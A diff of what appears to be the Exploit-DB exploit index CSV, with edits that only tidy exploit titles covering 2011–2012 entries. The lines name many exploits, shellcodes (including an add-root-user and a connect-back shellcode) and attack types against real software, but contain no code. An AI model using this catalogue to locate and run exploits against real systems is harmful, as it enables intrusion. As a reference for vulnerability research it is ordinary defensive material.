+17220,platforms/php/webapps/17220.txt,"eyeos 1.9.0.2 - Persistent Cross-Site Scripting Using Image Files",2011-04-28,"Alberto Ortega",php,webapps,0 17221,platforms/php/webapps/17221.txt,"kusaba x 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 17222,platforms/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,linux,dos,0 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0 @@ -15095,7 +15095,7 @@ id,file,description,date,author,platform,type,port 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities (Metasploit)",2011-05-30,Metasploit,windows,remote,0 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 17354,platforms/windows/remote/17354.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow",2011-06-01,b33f,windows,remote,0 -17355,platforms/windows/remote/17355.rb,"Golden FTP 4.70 - PASS Stack Buffer Overflow (Metasploit)",2011-06-02,Metasploit,windows,remote,21 +17355,platforms/windows/remote/17355.rb,"Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit)",2011-06-02,Metasploit,windows,remote,21 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 17359,platforms/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow",2011-06-03,mr.pr0n,windows,remote,0 @@ -15168,7 +15168,7 @@ id,file,description,date,author,platform,type,port 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall - Bypass Exploit",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - '.fat' Buffer Overflow",2011-06-23,"Iván García Ferreira",windows,local,0 -17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0 +17442,platforms/jsp/webapps/17442.txt,"ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0 17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple security Vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 17444,platforms/php/webapps/17444.txt,"Webcat - Multiple Blind SQL Injection",2011-06-23,w0rd,php,webapps,0 17445,platforms/php/webapps/17445.txt,"2Point Solutions - 'cmspages.php' SQL Injection",2011-06-23,"Newbie Campuz",php,webapps,0 @@ -15275,13 +15275,13 @@ id,file,description,date,author,platform,type,port 17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0 -17567,platforms/osx/dos/17567.txt,"Safari 5.0.6/5.1 - SVG DOM Processing (PoC)",2011-07-25,"Nikita Tarakanov",osx,dos,0 +17567,platforms/osx/dos/17567.txt,"Apple Safari 5.0.6/5.1 - SVG DOM Processing (PoC)",2011-07-25,"Nikita Tarakanov",osx,dos,0 17569,platforms/windows/dos/17569.py,"Ciscokits 1.0 - TFTP Server File Name Denial of Service",2011-07-25,"Craig Freyman",windows,dos,0 17570,platforms/php/webapps/17570.txt,"MusicBox 3.7 - Multiple Vulnerabilities",2011-07-25,R@1D3N,php,webapps,0 17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 - Cross-Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0 17572,platforms/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 - Improper User Privileges",2011-07-26,"Narendra Shinde",multiple,webapps,0 17573,platforms/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 - Remote Code Execution",2011-07-26,beford,php,webapps,0 -17575,platforms/windows/remote/17575.txt,"Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)",2011-07-26,Abysssec,windows,remote,0 +17575,platforms/windows/remote/17575.txt,"Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)",2011-07-26,Abysssec,windows,remote,0 17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool - Cross-Site Request Forgery (PoC)",2011-07-27,"Narendra Shinde",cgi,webapps,0 17578,platforms/windows/remote/17578.txt,"MinaliC WebServer 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,windows,remote,0 17579,platforms/php/webapps/17579.rb,"Joomla! Component com_virtuemart 1.5 / 1.1.7 - Blind Time-Based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0 @@ -15621,7 +15621,7 @@ id,file,description,date,author,platform,type,port 17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN 8.0.0.7 - Use-After-Free",2011-10-10,"Luigi Auriemma",windows,dos,0 17965,platforms/windows/dos/17965.txt,"OPC Systems.NET 4.00.0048 - Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0 17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File id Parameter Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0 -17967,platforms/windows/local/17967.rb,"TugZip 3.5 - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,windows,local,0 +17967,platforms/windows/local/17967.rb,"TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,windows,local,0 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow (2)",2011-10-13,Metasploit,windows,remote,0 @@ -15661,7 +15661,7 @@ id,file,description,date,author,platform,type,port 18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow (Metasploit)",2011-10-20,Metasploit,cgi,remote,0 18016,platforms/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX - ActiveX Control SaveViewStateToFile",2011-10-21,rgod,windows,remote,0 18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe Denial of Service (PoC)",2011-10-21,loneferret,windows,dos,0 -18018,platforms/php/webapps/18018.php,"Sports PHool 1.0 - Remote File Inclusion",2011-10-21,"cr4wl3r ",php,webapps,0 +18018,platforms/php/webapps/18018.php,"SportsPHool 1.0 - Remote File Inclusion",2011-10-21,"cr4wl3r ",php,webapps,0 18019,platforms/windows/dos/18019.txt,"Google Chrome - Killing Thread (PoC)",2011-10-22,pigtail23,windows,dos,0 18020,platforms/php/webapps/18020.txt,"Jara 1.6 - SQL Injection",2011-10-23,muuratsalo,php,webapps,0 18021,platforms/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (1)",2011-10-23,EgiX,php,webapps,0 @@ -15715,7 +15715,7 @@ id,file,description,date,author,platform,type,port 18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0 18080,platforms/linux/local/18080.c,"Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak Exploit",2011-11-04,"Todor Donev",linux,local,0 18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x - (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0 -18082,platforms/windows/local/18082.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (3)",2011-11-04,Metasploit,windows,local,0 +18082,platforms/windows/local/18082.rb,"Mini-stream Ripper 3.0.1.1 - Buffer Overflow (3)",2011-11-04,Metasploit,windows,local,0 18083,platforms/php/webapps/18083.php,"ZenPhoto 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18084,platforms/php/webapps/18084.php,"PHPMyFAQ 2.7.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 @@ -15770,10 +15770,10 @@ id,file,description,date,author,platform,type,port 18147,platforms/linux/local/18147.c,"bzexe (bzip2) - Race Condition",2011-11-23,vladz,linux,local,0 18148,platforms/php/webapps/18148.pl,"PHP-Nuke 8.1.0.3.5b - (Downloads) Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 18149,platforms/php/webapps/18149.php,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (1)",2011-11-23,EgiX,php,webapps,0 -18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0 +18151,platforms/php/webapps/18151.php,"Log1 CMS 2.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0 18153,platforms/cgi/webapps/18153.txt,"LibLime Koha 4.2 - Local File Inclusion",2011-11-24,"Akin Tosunlar",cgi,webapps,0 18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 -18155,platforms/php/webapps/18155.txt,"Zabbix 1.8.4 - (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0 +18155,platforms/php/webapps/18155.txt,"Zabbix 1.8.4 - 'popup.php' SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0 18156,platforms/php/webapps/18156.txt,"PHP video script - SQL Injection",2011-11-25,longrifle0x,php,webapps,0 18159,platforms/linux/dos/18159.py,"XChat - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",linux,dos,0 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 @@ -15788,7 +15788,7 @@ id,file,description,date,author,platform,type,port 18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",windows,local,0 18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 - 'afd.sys' Privilege Escalation (MS11-080)",2011-11-30,ryujin,windows,local,0 18177,platforms/php/webapps/18177.txt,"WikkaWiki 1.3.2 - Multiple Security Vulnerabilities",2011-11-30,EgiX,php,webapps,0 -18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit '.m3u' (Metasploit)",2011-11-30,Rh0,windows,local,0 +18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow SEH Exploit (Metasploit)",2011-11-30,Rh0,windows,local,0 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0 18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Root Exploit",2011-12-01,kingcope,freebsd,remote,0 18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0 @@ -15799,7 +15799,7 @@ id,file,description,date,author,platform,type,port 18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0 18188,platforms/windows/dos/18188.txt,"Hillstone Software HS TFTP Server 1.3.2 - Denial of Service",2011-12-02,"SecPod Research",windows,dos,0 18189,platforms/windows/remote/18189.txt,"Ipswitch TFTP Server 1.0.0.24 - Directory Traversal",2011-12-02,"SecPod Research",windows,remote,0 -18190,platforms/windows/remote/18190.rb,"Serv-U FTP Server < 4.2 - Buffer Overflow (Metasploit)",2011-12-02,Metasploit,windows,remote,0 +18190,platforms/windows/remote/18190.rb,"RhinoSoft Serv-U FTPd Server < 4.2 - Buffer Overflow (Metasploit)",2011-12-02,Metasploit,windows,remote,0 18192,platforms/php/webapps/18192.txt,"Joomla! Component Jobprofile (com_jobprofile) - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0 18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 / 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0 18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 - 'sop://' URI Handling Remote Stack Buffer Overflow (PoC)",2011-12-05,LiquidWorm,windows,dos,0 @@ -15811,7 +15811,7 @@ id,file,description,date,author,platform,type,port 18201,platforms/windows/local/18201.txt,"SopCast 3.4.7 - (Diagnose.exe) Improper Permissions",2011-12-05,LiquidWorm,windows,local,0 18202,platforms/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",php,webapps,0 18207,platforms/php/webapps/18207.txt,"Alstrasoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps,0 -18208,platforms/php/webapps/18208.rb,"Family Connections - less.php Remote Command Execution (Metasploit)",2011-12-07,Metasploit,php,webapps,0 +18208,platforms/php/webapps/18208.rb,"Family Connections CMS - 'less.php' Remote Command Execution (Metasploit)",2011-12-07,Metasploit,php,webapps,0 18215,platforms/php/webapps/18215.txt,"SourceBans 1.4.8 - SQL Injection / Local File Inclusion Injection",2011-12-07,Havok,php,webapps,0 18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,php,webapps,0 18218,platforms/php/webapps/18218.txt,"Joomla! Component QContacts 1.0.6 - SQL Injection",2011-12-08,Don,php,webapps,0 @@ -15828,7 +15828,7 @@ id,file,description,date,author,platform,type,port 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - connect back Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18228,platforms/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation",2011-12-10,otr,linux,local,0 -18230,platforms/php/webapps/18230.txt,"FCMS 2.7.2 CMS - Multiple Persistent Cross-Site Scripting",2011-12-10,"Ahmed Elhady Mohamed",php,webapps,0 +18230,platforms/php/webapps/18230.txt,"Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting",2011-12-10,"Ahmed Elhady Mohamed",php,webapps,0 18231,platforms/php/webapps/18231.txt,"WordPress Plugin UPM-POLLS 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0 18232,platforms/php/webapps/18232.txt,"FCMS 2.7.2 CMS - Multiple Cross-Site Request Forgery Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 @@ -15858,8 +15858,8 @@ id,file,description,date,author,platform,type,port 18270,platforms/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,windows,dos,0 18271,platforms/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service",2011-12-24,Level,windows,dos,0 18272,platforms/windows/dos/18272.py,"Microsoft Windows Explorer - Denial of Service",2011-12-24,Level,windows,dos,0 -18274,platforms/php/webapps/18274.txt,"openemr 4 - Multiple Vulnerabilities",2011-12-25,Level,php,webapps,0 -18275,platforms/win_x86-64/dos/18275.txt,"Safari - GdiDrawStream BSoD",2011-12-18,webDEViL,win_x86-64,dos,0 +18274,platforms/php/webapps/18274.txt,"OpenEMR 4 - Multiple Vulnerabilities",2011-12-25,Level,php,webapps,0 +18275,platforms/win_x86-64/dos/18275.txt,"Apple Safari - GdiDrawStream BSoD",2011-12-18,webDEViL,win_x86-64,dos,0 18276,platforms/php/webapps/18276.txt,"WordPress Plugin Mailing List - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0 18277,platforms/php/webapps/18277.txt,"Free Image Hosting Script - Arbitrary File Upload",2011-12-26,ySecurity,php,webapps,0 18278,platforms/linux/dos/18278.txt,"Nagios Plugin check_ups - Local Buffer Overflow (PoC)",2011-12-26,"Stefan Schurtz",linux,dos,0 @@ -15907,7 +15907,7 @@ id,file,description,date,author,platform,type,port 18338,platforms/php/webapps/18338.txt,"phpMyDirectory.com 1.3.3 - SQL Injection",2012-01-08,Serseri,php,webapps,0 18339,platforms/windows/dos/18339.py,"GPSMapEdit 1.1.73.2 - '.lst' Local Denial of Service",2012-01-09,"Julien Ahrens",windows,dos,0 18340,platforms/php/webapps/18340.txt,"Paddelberg Topsite Script - Authentication Bypass",2012-01-09,"Christian Inci",php,webapps,0 -18341,platforms/php/webapps/18341.txt,"clip bucket 2.6 - Multiple Vulnerabilities",2012-01-09,YaDoY666,php,webapps,0 +18341,platforms/php/webapps/18341.txt,"Clipbucket 2.6 - Multiple Vulnerabilities",2012-01-09,YaDoY666,php,webapps,0 18342,platforms/php/webapps/18342.txt,"SAPID 1.2.3 Stable - Remote File Inclusion",2012-01-09,"Opa Yong",php,webapps,0 18343,platforms/linux/webapps/18343.pl,"Enigma2 Webinterface 1.7.x 1.6.x 1.5.x - (linux) Remote File Disclosure",2012-01-09,"Todor Donev",linux,webapps,0 18344,platforms/php/webapps/18344.txt,"RazorCMS 1.2 - Directory Traversal",2012-01-10,chap0,php,webapps,0 @@ -16013,7 +16013,7 @@ id,file,description,date,author,platform,type,port 18463,platforms/windows/dos/18463.html,"PDF Viewer Component - ActiveX Denial of Service",2012-02-05,"Senator of Pirates",windows,dos,0 18464,platforms/php/webapps/18464.html,"GAzie 5.20 - Cross-Site Request Forgery",2012-02-05,"Giuseppe D'Inverno",php,webapps,0 18465,platforms/php/webapps/18465.txt,"BASE 1.4.5 - (base_qry_main.php t_view) SQL Injection",2012-02-06,"a.kadir altan",php,webapps,0 -18466,platforms/php/webapps/18466.txt,"Tube Ace(Adult PHP Tube Script) - SQL Injection",2012-02-06,"Daniel Godoy",php,webapps,0 +18466,platforms/php/webapps/18466.txt,"Tube Ace (Adult PHP Tube Script) - SQL Injection",2012-02-06,"Daniel Godoy",php,webapps,0 18467,platforms/php/webapps/18467.txt,"XRayCMS 1.1.1 - SQL Injection",2012-02-06,chap0,php,webapps,0 18468,platforms/php/webapps/18468.html,"Flyspray 0.9.9.6 - Cross-Site Request Forgery",2012-02-07,"Vaibhav Gupta",php,webapps,0 18469,platforms/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service",2012-02-07,"Balazs Makany",windows,dos,0 @@ -16024,7 +16024,7 @@ id,file,description,date,author,platform,type,port 18476,platforms/windows/remote/18476.py,"Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow (Metasploit)",2012-02-10,Metasploit,windows,remote,0 18479,platforms/windows/remote/18479.rb,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Buffer Overflow (Metasploit)",2012-02-10,Metasploit,windows,remote,0 -18480,platforms/php/webapps/18480.txt,"Dolibarr CMS 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,php,webapps,0 +18480,platforms/php/webapps/18480.txt,"Dolibarr 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,php,webapps,0 18481,platforms/windows/dos/18481.py,"jetVideo 8.0.2 - Denial of Service",2012-02-10,"Senator of Pirates",windows,dos,0 18483,platforms/php/webapps/18483.txt,"Fork CMS 3.2.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2012-02-12,"Avram Marius",php,webapps,0 18499,platforms/hardware/webapps/18499.txt,"D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",hardware,webapps,0 @@ -16119,7 +16119,7 @@ id,file,description,date,author,platform,type,port 18619,platforms/multiple/remote/18619.txt,"Apache Tomcat - Remote Exploit (PUT Request) and Account Scanner",2012-03-19,kingcope,multiple,remote,0 18589,platforms/php/webapps/18589.txt,"Acal Calendar 2.2.6 - Cross-Site Request Forgery",2012-03-12,"Number 7",php,webapps,0 18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 -18590,platforms/php/webapps/18590.txt,"PBLang - Local File Inclusion",2012-03-13,"Number 7",php,webapps,0 +18590,platforms/php/webapps/18590.txt,"PBLang Bulletin Board System - Local File Inclusion",2012-03-13,"Number 7",php,webapps,0 18591,platforms/php/webapps/18591.txt,"Cycade Gallery - SQL Injection",2012-03-13,-DownFall,php,webapps,0 18592,platforms/php/webapps/18592.txt,"4Images - Image Gallery Management System - Cross-Site Request Forgery",2012-03-13,"Dmar al3noOoz",php,webapps,0 18597,platforms/hardware/webapps/18597.txt,"Sitecom WLM-2501 - Cross-Site Request Forgery",2012-03-14,"Ivano Binetti",hardware,webapps,0 @@ -16127,7 +16127,7 @@ id,file,description,date,author,platform,type,port 18599,platforms/php/webapps/18599.txt,"asaanCart - Cross-Site Scripting / Local File Inclusion",2012-03-14,"Number 7",php,webapps,0 18602,platforms/windows/dos/18602.txt,"Epson EventManager 2.50 - Denial of Service",2012-03-14,"Luigi Auriemma",windows,dos,0 18603,platforms/windows/webapps/18603.txt,"TVersity 1.9.7 - Arbitrary File Download",2012-03-14,"Luigi Auriemma",windows,webapps,0 -18604,platforms/windows/remote/18604.rb,"NetDecision 4.5.1 - HTTP Server Buffer Overflow (Metasploit)",2012-03-15,Metasploit,windows,remote,0 +18604,platforms/windows/remote/18604.rb,"Netmechanica NetDecision HTTP Server 4.5.1 - Buffer Overflow (Metasploit)",2012-03-15,Metasploit,windows,remote,0 18605,platforms/windows/webapps/18605.txt,"sockso 1.5 - Directory Traversal",2012-03-15,"Luigi Auriemma",windows,webapps,0 18606,platforms/windows/dos/18606.txt,"Microsoft Terminal Services - Use-After-Free (MS12-020)",2012-03-16,"Luigi Auriemma",windows,dos,0 18607,platforms/php/webapps/18607.txt,"OneFileCMS 1.1.5 - Local File Inclusion",2012-03-16,mr.pr0n,php,webapps,0 @@ -16160,21 +16160,21 @@ id,file,description,date,author,platform,type,port 18640,platforms/windows/remote/18640.txt,"Google Talk - 'gtalk://' Deprecated URI Handler Parameter Injection",2012-03-22,rgod,windows,remote,0 18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow",2012-03-22,rgod,windows,dos,0 18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,Metasploit,windows,remote,0 -18643,platforms/windows/dos/18643.py,"Ricoh DC Software DL-10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow",2012-03-22,"Julien Ahrens",windows,dos,0 +18643,platforms/windows/dos/18643.py,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow",2012-03-22,"Julien Ahrens",windows,dos,0 18644,platforms/php/webapps/18644.txt,"vBShout - Persistent Cross-Site Scripting",2012-03-22,ToiL,php,webapps,0 18646,platforms/hardware/webapps/18646.txt,"Cyberoam UTM - Multiple Vulnerabilities",2012-03-22,"Saurabh Harit",hardware,webapps,0 18647,platforms/php/webapps/18647.txt,"PHP Grade Book 1.9.4 - Unauthenticated SQL Database Export",2012-03-22,"Mark Stanislav",php,webapps,0 18648,platforms/php/webapps/18648.txt,"phpMoneyBooks 1.0.2 - Local File Inclusion",2012-03-22,"Mark Stanislav",php,webapps,0 18649,platforms/php/webapps/18649.txt,"FreePBX 2.10.0 / 2.9.0 - Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",php,webapps,0 18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution",2012-03-23,muts,php,webapps,0 -18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 new - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 +18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 18652,platforms/php/webapps/18652.txt,"Wolfcms 0.75 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities",2012-03-23,"Ivano Binetti",php,webapps,0 18654,platforms/windows/dos/18654.txt,"Spotify 0.8.2.610 - (search func) Memory Exhaustion Exploit",2012-03-23,LiquidWorm,windows,dos,0 18655,platforms/php/webapps/18655.php,"PHPFox 3.0.1 - (ajax.php) Remote Command Execution",2012-03-23,EgiX,php,webapps,0 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - '.m3u' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 -18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,windows,remote,0 +18658,platforms/windows/remote/18658.rb,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,windows,remote,0 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution (Metasploit)",2012-03-24,Metasploit,php,webapps,0 18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusion",2012-03-24,localh0t,php,webapps,0 18661,platforms/windows/dos/18661.txt,"RealPlayer - '.mp4' file handling memory Corruption",2012-03-24,"Senator of Pirates",windows,dos,0 @@ -16188,7 +16188,7 @@ id,file,description,date,author,platform,type,port 18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree and SimpleTree Classes",2012-03-28,rgod,windows,remote,0 18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,hardware,remote,0 18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0 -18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam - ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0 +18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0 18717,platforms/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 18679,platforms/multiple/remote/18679.rb,"Java - AtomicReferenceArray Type Violation (Metasploit)",2012-03-30,Metasploit,multiple,remote,0 18680,platforms/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,php,webapps,0 @@ -16226,7 +16226,7 @@ id,file,description,date,author,platform,type,port 18732,platforms/php/webapps/18732.txt,"Software DEP Classified Script 2.5 - SQL Injection",2012-04-12,"hordcode security",php,webapps,0 18733,platforms/linux/local/18733.py,"WICD - Local Privilege Esclation Exploit",2012-04-12,anonymous,linux,local,0 18734,platforms/hardware/dos/18734.txt,"EMC IRM License Server 4.6.1.1995 - Denial of Service",2012-04-12,"Luigi Auriemma",hardware,dos,0 -18735,platforms/windows/remote/18735.rb,"Quest InTrust Annotation Objects - Uninitialized Pointer (Metasploit)",2012-04-13,Metasploit,windows,remote,0 +18735,platforms/windows/remote/18735.rb,"Quest InTrust - Annotation Objects Uninitialized Pointer (Metasploit)",2012-04-13,Metasploit,windows,remote,0 18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilities",2012-04-13,shpendk,php,webapps,0 